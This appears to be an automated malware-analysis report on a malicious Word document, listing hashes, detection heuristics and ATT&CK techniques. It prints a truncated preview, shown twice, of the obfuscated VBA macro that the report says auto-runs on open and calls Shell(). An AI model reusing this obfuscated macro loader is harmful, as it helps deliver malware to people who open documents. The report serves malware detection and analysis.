Office (OLE) malware analysis — malicious · 8db5e76c69eb85b8

MALICIOUS

Office (OLE)

80.5 KB Created: 2017-10-16 06:40:00 Authoring application: Microsoft Office Word First seen: 2017-10-28

MD5: 8e6b32f203c5d449c0327c15b2c40c88 SHA-1: 8f4d61faa8e3c7ee1fdcf7fe17bd899e869e8f0a SHA-256: 8db5e76c69eb85b8b6de86d11fe6cd7aba52a8f2ea7e81e55bd05ec1f8f3c9ef

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and uses the Shell() function, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The specific obfuscated strings within the VBA script prevent a more detailed analysis of the payload's destination or function.

Heuristics 7

ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10881 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10881 bytes
SHA-256: `4b1d137e2c50c3a4e37c4f78365eb33fd7fd794fd5811b988a8bca8188f0a3de`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub CLdQAMorf() djshhbABYzj = "8LYMD35ZORSUWNJuzkihwitojjwKmvhNzUXhBqjjRPViiTwfHH5VVG8BGKK" zYRoasGOV = Mid(djshhbABYzj, 15, 36) kEBmYwjan = zYRoasGOV fvCDVzMJbt = "IOU7atLbFiLunuisqSbOtASqXWIaJamDqtDFG2G6A4IBR5CLT70B34" WuznKh = Mid(fvCDVzMJbt, 5, 30) iLBjzip = WuznKh uikcXOlLLR = "P2LGQlRCfRStiawtqEOXNuzDqwVKjOWOWENScEWTM0AVGQ74KSOG" mvzUOMrajN = Mid(uikcXOlLLR, 3, 37) wapAdQE = mvzUOMrajN HbhndCu = "KF24XFEY43K38R9IHRJYdPUUuboKmULDUYfrXdUbsGAwQhJI3OO89EKCD" JjJCoLw = Mid(HbhndCu, 21, 27) QVwRq = JjJCoLw EcjmWr = "SBAAIGEG2WOHjZzHOojkLVuVEwjZTwsbVrvcZFowZNKVSiNLpjmPEAHJwnzzwrQzinmsdUhIzhKzLZCajVjnJdWUkmfmEZYVO35HCIJPQ4MP7GTP332O" nwPRQHo = Mid(EcjmWr, 10, 83) izAhjafaYzs = nwPRQHo oddBUmFP = "RGrBiwMqfsUiVwdPXqJwXkYNbHdnBRRHqovCHfcAwiXiOmOofNziboIChdaaSZpNaNrhDbIrP90Z6R0RJ87Z70U9NIALGYAG30SUJC5Y20M4" ZjFSvTHBnLB = Mid(oddBUmFP, 2, 71) tslrDXRXanm = ZjFSvTHBnLB RPorTm = "VH1C23VR5WV7C02juBpGMwsDXiCClaCnMIPTQGWRuEWaMdQlhfcMEqqsDRmzLUcvCaGUpCToiYLIbSqtSZMY6JB5T9" hkhYwEUYoOD = Mid(RPorTm, 16, 66) uuNiHkNNm = hkhYwEUYoOD hHGYHEjPO = "54EQUGwqiVSWQwTYFabbXmXwwiLnhjihRlasiuzVzLskBSmUVGSlhzuDWWUqvKIBqkFiXRB8JIDUWXVX1QLV74KGF7UZ" STzPYhGz = Mid(hHGYHEjPO, 4, 66) JTVtEHKWp = STzPYhGz BQwiqn = "4JOQNHwvMGJbUiJicqzErhmzknoADllSfrIDtdQkt2JEF7XSMSWE528W9EGLO7JD" GvVMYp = Mid(BQwiqn, 4, 38) GHWlWwf = GvVMYp azCCrGizW = "" + CbHdwK + SYidK + ppljY + vklljZwj + KHWDfw + rrETtarf + wOViTJC + sMjRqa + boHRMaiG + wubFvVtF + kKbFzBFB + TNjBQ + "com" + "ments" + CbHdwK + SYidK + ppljY + vklljZwj + KHWDfw + rrETtarf + wOViTJC + sMjRqa + boHRMaiG + wubFvVtF + kKbFzBFB + TNjBQ + TSlkO + VkOnVO + PzrpMqq + YVrFMKQL + zospInRm ZpvJvGnPB = Right(Left((WoumqwXRB(azCCrGizW)), 7912), 49) YhovFWkcLD = Mid((WoumqwXRB(azCCrGizW)), 11750, 55) NNUjQjZbN = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 11806), 110) YkQadj = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 12631), 55) lQNBcTfnE = Right(Left((WoumqwXRB(azCCrGizW)), 10981), 5) LcjHhv = Mid((WoumqwXRB(azCCrGizW)), 2468, 56) WfcwcVTQ = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 9632), 94) wHwDTERzMr = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 4037), 141) vUPArkoci = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 14596), 115) GkDJT = Mid((WoumqwXRB(azCCrGizW)), 14214, 28) IDUwIERII = Right(Left((WoumqwXRB(azCCrGizW)), 3133), 122) hjjNlkIhci = Mid((WoumqwXRB(azCCrGizW)), 6897, 54) iGRFqSQu = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 207), 28) jjJQzM = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 4400), 116) ibImBvSsw = Right(Left((WoumqwXRB(azCCrGizW)), 9142), 133) lJAZc = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 3954), 70) qzapslrTCA = Right(Left((WoumqwXRB(azCCrGizW)), 2426), 129) mwWtvGS = Right(Left((WoumqwXRB(azCCrGizW)), 7744), 42) WmzTw = Mid((WoumqwXRB(azCCrGizW)), 11514, 1) FfJjfE = Mid((WoumqwXRB(azCCrGizW)), 5203, 124) ItjXuh = Right(Left((WoumqwXRB(azCCrGizW)), 10014), 15) odjFPPE = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 13243), 45) onUMdV = Mid((WoumqwXRB(azCCrGizW)), 3575, 148) fNXrXpiaLl = Right(Left((WoumqwXRB(azCCrGizW)), 6363), 24) vBXdTJqQ = Mid((WoumqwXRB(azCCrGizW)), 4853, 77) paqXqRBwiXm = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 91), 78) TVbQnwi = Mid((WoumqwXRB(azCCrGizW)), 10778, 99) CvNmQqtUf = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 996), 144) iYwAA = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 6294), 42) YNGflQm = Right(Left((WoumqwXRB(azCCrGizW)), 1615), 27) ssCRIt = Mid((WoumqwXRB(azCCrGizW)), 7033, 61) uJDAKFKr = Right(Left((WoumqwXRB(azCC ... (truncated)

SHA-256: 4b1d137e2c50c3a4e37c4f78365eb33fd7fd794fd5811b988a8bca8188f0a3de

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub CLdQAMorf()
djshhbABYzj = "8LYMD35ZORSUWNJuzkihwitojjwKmvhNzUXhBqjjRPViiTwfHH5VVG8BGKK"
zYRoasGOV = Mid(djshhbABYzj, 15, 36)
kEBmYwjan = zYRoasGOV
fvCDVzMJbt = "IOU7atLbFiLunuisqSbOtASqXWIaJamDqtDFG2G6A4IBR5CLT70B34"
WuznKh = Mid(fvCDVzMJbt, 5, 30)
iLBjzip = WuznKh
uikcXOlLLR = "P2LGQlRCfRStiawtqEOXNuzDqwVKjOWOWENScEWTM0AVGQ74KSOG"
mvzUOMrajN = Mid(uikcXOlLLR, 3, 37)
wapAdQE = mvzUOMrajN
HbhndCu = "KF24XFEY43K38R9IHRJYdPUUuboKmULDUYfrXdUbsGAwQhJI3OO89EKCD"
JjJCoLw = Mid(HbhndCu, 21, 27)
QVwRq = JjJCoLw
EcjmWr = "SBAAIGEG2WOHjZzHOojkLVuVEwjZTwsbVrvcZFowZNKVSiNLpjmPEAHJwnzzwrQzinmsdUhIzhKzLZCajVjnJdWUkmfmEZYVO35HCIJPQ4MP7GTP332O"
nwPRQHo = Mid(EcjmWr, 10, 83)
izAhjafaYzs = nwPRQHo
oddBUmFP = "RGrBiwMqfsUiVwdPXqJwXkYNbHdnBRRHqovCHfcAwiXiOmOofNziboIChdaaSZpNaNrhDbIrP90Z6R0RJ87Z70U9NIALGYAG30SUJC5Y20M4"
ZjFSvTHBnLB = Mid(oddBUmFP, 2, 71)
tslrDXRXanm = ZjFSvTHBnLB
RPorTm = "VH1C23VR5WV7C02juBpGMwsDXiCClaCnMIPTQGWRuEWaMdQlhfcMEqqsDRmzLUcvCaGUpCToiYLIbSqtSZMY6JB5T9"
hkhYwEUYoOD = Mid(RPorTm, 16, 66)
uuNiHkNNm = hkhYwEUYoOD
hHGYHEjPO = "54EQUGwqiVSWQwTYFabbXmXwwiLnhjihRlasiuzVzLskBSmUVGSlhzuDWWUqvKIBqkFiXRB8JIDUWXVX1QLV74KGF7UZ"
STzPYhGz = Mid(hHGYHEjPO, 4, 66)
JTVtEHKWp = STzPYhGz
BQwiqn = "4JOQNHwvMGJbUiJicqzErhmzknoADllSfrIDtdQkt2JEF7XSMSWE528W9EGLO7JD"
GvVMYp = Mid(BQwiqn, 4, 38)
GHWlWwf = GvVMYp
azCCrGizW = "" + CbHdwK + SYidK + ppljY + vklljZwj + KHWDfw + rrETtarf + wOViTJC + sMjRqa + boHRMaiG + wubFvVtF + kKbFzBFB + TNjBQ + "com" + "ments" + CbHdwK + SYidK + ppljY + vklljZwj + KHWDfw + rrETtarf + wOViTJC + sMjRqa + boHRMaiG + wubFvVtF + kKbFzBFB + TNjBQ + TSlkO + VkOnVO + PzrpMqq + YVrFMKQL + zospInRm
ZpvJvGnPB = Right(Left((WoumqwXRB(azCCrGizW)), 7912), 49)
YhovFWkcLD = Mid((WoumqwXRB(azCCrGizW)), 11750, 55)
NNUjQjZbN = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 11806), 110)
YkQadj = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 12631), 55)
lQNBcTfnE = Right(Left((WoumqwXRB(azCCrGizW)), 10981), 5)
LcjHhv = Mid((WoumqwXRB(azCCrGizW)), 2468, 56)
WfcwcVTQ = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 9632), 94)
wHwDTERzMr = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 4037), 141)
vUPArkoci = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 14596), 115)
GkDJT = Mid((WoumqwXRB(azCCrGizW)), 14214, 28)
IDUwIERII = Right(Left((WoumqwXRB(azCCrGizW)), 3133), 122)
hjjNlkIhci = Mid((WoumqwXRB(azCCrGizW)), 6897, 54)
iGRFqSQu = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 207), 28)
jjJQzM = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 4400), 116)
ibImBvSsw = Right(Left((WoumqwXRB(azCCrGizW)), 9142), 133)
lJAZc = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 3954), 70)
qzapslrTCA = Right(Left((WoumqwXRB(azCCrGizW)), 2426), 129)
mwWtvGS = Right(Left((WoumqwXRB(azCCrGizW)), 7744), 42)
WmzTw = Mid((WoumqwXRB(azCCrGizW)), 11514, 1)
FfJjfE = Mid((WoumqwXRB(azCCrGizW)), 5203, 124)
ItjXuh = Right(Left((WoumqwXRB(azCCrGizW)), 10014), 15)
odjFPPE = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 13243), 45)
onUMdV = Mid((WoumqwXRB(azCCrGizW)), 3575, 148)
fNXrXpiaLl = Right(Left((WoumqwXRB(azCCrGizW)), 6363), 24)
vBXdTJqQ = Mid((WoumqwXRB(azCCrGizW)), 4853, 77)
paqXqRBwiXm = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 91), 78)
TVbQnwi = Mid((WoumqwXRB(azCCrGizW)), 10778, 99)
CvNmQqtUf = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 996), 144)
iYwAA = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 6294), 42)
YNGflQm = Right(Left((WoumqwXRB(azCCrGizW)), 1615), 27)
ssCRIt = Mid((WoumqwXRB(azCCrGizW)), 7033, 61)
uJDAKFKr = Right(Left((WoumqwXRB(azCC
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.